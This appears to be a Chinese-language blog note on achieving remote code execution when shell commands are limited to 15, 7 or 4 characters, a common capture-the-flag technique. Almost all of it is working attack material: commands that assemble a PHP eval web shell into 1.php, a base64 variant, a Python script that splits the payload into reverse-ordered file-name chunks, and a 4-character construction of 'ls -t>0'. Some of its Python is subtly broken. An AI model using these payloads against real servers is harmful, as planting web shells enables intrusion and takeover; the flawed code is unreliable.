限制字符下的RCE

限制字符下的RCE

需要转义的字符：

'<', '>', '(', ')', '[', ']', '$', ';', ' '

15字符限制

RCE = <?php eval($_GET[1]);

# coding:utf-8
# @Auther: Vicr
def filter(rce):
    scope = ['<', '>', '(', ')', '$', ';', '[', ']'， ' ']
    result = ''
    for i in rce:
        if i in scope:
            result += '\\' + i
        else:
            result += i
    return result

执行的命令如下:

echo \<?php>1
echo eval\(>>1
echo \$_GET>>1
echo \[1\]>>1
echo \)\;>>1
mv 1 1.php

7字符限制

<?php phpinfo();
经过base64转换
echo PD9waHAgcGhwaW5mbygpOw==|base64 -d >1.php
将第三行写入即可RCE,主要要倒序写，因为要配合ls -t

代码如下

#!/usr/bin/python
#7字符RCE
# coding:utf-8
# @Auther: Vicr
import os
import base64

def fun(rce):
    list = []
    num = 0
    length = len(rce)
    while num < length:
        res = rce[num: num + 3]
        if ' ' in res:
            res = rce[num: num + 2]
            res = res.replace(' ', '\ ', 5)
            list.append(res)
            num += 2
            continue

        if '|' in res:
            res = rce[num: num + 2]
            res = res.replace('|', '\|', 5)
            list.append(res)
            num += 2
            continue

        list.append(res)
        num += 3
    payload.append('hp')
    payload.append('1.p')
    payload.append('\>')
    payload.append('\ ')
    return list


if __name__ == '__main__':
    payload = []
    bs64 = base64.b64encode(str.encode('utf-8'))
    RCE = 'echo PD9waHAgZXZhbCgkX0dFVFsxXSk7|base64 -d' #<?php eval($_GET[1]);
    print(RCE)
    res = fun(RCE)
    for i in range(len(res)):
        payload.append(res.pop())
    if (os.path.exists('./payload.txt')):
        os.remove('./payload.txt')
    for i in range(len(payload)):
        with open('./payload.txt', 'a+') as f:
            if(payload[i] == 'hp'):
                f.write('w>' + payload[i] + '\n')
                continue
            f.write('w>' + payload[i] + '\\\\' + '\n')
    print("OK")

4字符限制

这里主要记录下ls -t>0这条命令如何替换

>f\>
>ht-
>sl
>dir
*>v
>rev
*v>0